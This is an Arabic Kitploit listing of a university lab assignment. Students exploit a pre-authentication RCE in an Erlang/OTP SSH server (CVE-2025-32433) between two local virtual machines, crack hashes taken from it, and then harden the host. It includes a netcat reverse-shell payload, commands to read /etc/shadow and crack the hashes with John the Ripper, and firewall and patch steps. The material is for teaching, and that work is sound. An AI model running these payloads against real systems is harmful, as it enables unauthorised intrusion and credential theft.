Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
Exploiting-a-vulnerability-using-reverse-shell — يحاكي هذا المشروع سيناريو هجوم ودفاع واقعي عبر جهازين افتراضيين. ستستغل ثغرة حرجة في تنفيذ الأوامر عن بُعد (RCE) قبل المصادقة (CVE-2025-32433) في خادم Erlang/OTP SSH، وتكسر تجزئات كلمات المرور المستخرجة، ثم تعزز الجهاز الضحية بقواعد جدار ناري وتصحيحات. | Kitploit
أدوات/GitHubGitHub/dampedcoast/exploiting-a-vulnerability-using-reverse-shell
كسر كلمات المرورتحليل الثغرات الأمنيةالاستغلالأمن الشبكاتCTFاختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
dampedcoast/exploiting-a-vulnerability-using-reverse-shell

Exploiting-a-vulnerability-using-reverse-shell

يحاكي هذا المشروع سيناريو هجوم ودفاع واقعي عبر جهازين افتراضيين. ستستغل ثغرة حرجة في تنفيذ الأوامر عن بُعد (RCE) قبل المصادقة (CVE-2025-32433) في خادم Erlang/OTP SSH، وتكسر تجزئات كلمات المرور المستخرجة، ثم تعزز الجهاز الضحية بقواعد جدار ناري وتصحيحات.

عرض المستودع
منذ 2 أشهرلم تتم المراجعة بعد

أساسيات أمن المعلومات — مشروع ربيع 2026

النقاط الإجمالية: 20 | الموعد النهائي: لا يُقبل أي تسليم متأخر

نظرة عامة

يحاكي هذا المشروع سيناريو هجوم ودفاع واقعي عبر جهازين افتراضيين. ستستغل ثغرة تنفيذ تعليمات برمجية عن بعد (RCE) حرجة قبل المصادقة (CVE-2025-32433) في خادم SSH الخاص بـ Erlang/OTP، وتكسر تجزئات كلمات المرور المستخرجة، ثم تعزز الجهاز الضحية بقواعد جدار الحماية والتصحيح.

الدورنظام التشغيل
المهاجمKali Linux
الضحيةUbuntu/Debian (Erlang/OTP SSH v27.3.2)

الملفات

الملفالوصف
Debian-1.ovaصورة جهاز افتراضي للضحية مُعدة مسبقًا — قم بتنزيلها بشكل منفصل، انظر الموارد (كبيرة جدًا لاستضافتها على GitHub)

الموارد

  • الجهاز الظاهري للضحية (Debian-1.ova): رابط التحميل — كبير جدًا (~3 جيجابايت) لاستضافته على GitHub. قم بتنزيله بشكل منفصل واستيراده إلى VirtualBox/VMware كما هو موضح أدناه.
  • قائمة الكلمات (rockyou_txt.txt): مضمنة في هذا المستودع، تُستخدم في خطوة كسر كلمة المرور في الجزء 2.

الإعداد

  1. استيراد الأجهزة الافتراضية — قم بتحميل Debian-1.ova وجهاز Kali Linux الافتراضي الخاص بك إلى VirtualBox/VMware.
  2. الشبكة — اضبط كلا الجهازين على محول المضيف فقط (Host-Only Adapter) ليتمكنا من التواصل بشكل خاص.
  3. عنوان IP للضحية — قم بتشغيل الجهاز الضحية وشغّل ifconfig للعثور على عنوان IP الخاص به (عادةً في 192.168.56.0/24).

الجزء 1 — نشر واستغلال خادم SSH الضعيف (10 نقاط)

استطلاع

root@kitploit:~
nmap -p 2222 -sV -A <victim-IP>

وثّق المنافذ المفتوحة وإصدارات الخدمات وتوقيعات Erlang.

استغلال CVE-2025-32433 (RCE قبل المصادقة)

قم بتحويل Kali مؤقتًا إلى NAT لاستنساخ المستودع، ثم ارجع إلى Host-Only.

root@kitploit:~
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py

قم بتعديل البرنامج النصي — اضبط HOST = "<victim-IP>" وقم بتحديث الحمولة:

root@kitploit:~
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'

الطرفية 1 (Kali) — ابدأ المستمع:

root@kitploit:~
nc -lvnp 4444

الطرفية 2 (Kali) — شغّل الاستغلال:

root@kitploit:~
python3 CVE-2025-32433.py

في الصدفة العكسية، قم بتشغيل whoami و hostname لتأكيد الوصول.


الجزء 2 — ما بعد الاستغلال وكسر كلمة المرور (5 نقاط)

استخراج وكسر التجزئة

root@kitploit:~
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt

# On Kali
john --wordlist=rockyou_txt.txt hash.txt

وثّق تنسيق التجزئة (على سبيل المثال، $6$ = SHA-512)، الوقت المستغرق، وكلمة المرور النصية الصريحة المستعادة.

العثور على العلم

root@kitploit:~
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt

الجزء 3 — الضوابط والإصلاح (5 نقاط)

حظر ناقل الهجوم (iptables)

root@kitploit:~
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP

أعد تشغيل مسح Nmap والاستغلال من Kali — وثّق أن المنفذ 2222 أصبح الآن "مُصفّى (Filtered)" وأن الاستغلال يفشل.

تصحيح الثغرة

وثّق الخطوات اللازمة لترقية Erlang/OTP إلى الإصدار v27.3.3 أو أحدث، الذي يحتوي على الإصلاح لـ CVE-2025-32433.


التسليمات

  • تقرير كامل مع لقطات شاشة لـ: المسح، تنفيذ الاستغلال، الصدفة العكسية (whoami/hostname)، التقاط العلم
  • توثيق جدار الحماية قبل/بعد (نتائج Nmap تظهر تغيير حالة المنفذ)
  • تأمل كتابي يشرح لماذا تعتبر ثغرات RCE قبل المصادقة أكثر خطورة بشكل كبير من استغلالات ما بعد المصادقة

مرجع CVE

CVE-2025-32433 — تنفيذ تعليمات برمجية عن بعد حرج قبل المصادقة في خادم SSH الخاص بـ Erlang/OTP. يمكن استغلاله عن طريق إرسال حزم SSH غير صالحة قبل أي تبادل لبيانات الاعتماد، مما يمنح المهاجم غير المصادق وصولًا كاملاً إلى الصدفة.

تنزيل الأداة
Project Spring 2026 - Google Docs.pdfتعليمات المشروع الكاملة مع التسليمات
rockyou_txt.txtقائمة كلمات مستخدمة مع John the Ripper لكسر تجزئة كلمة المرور المستخرجة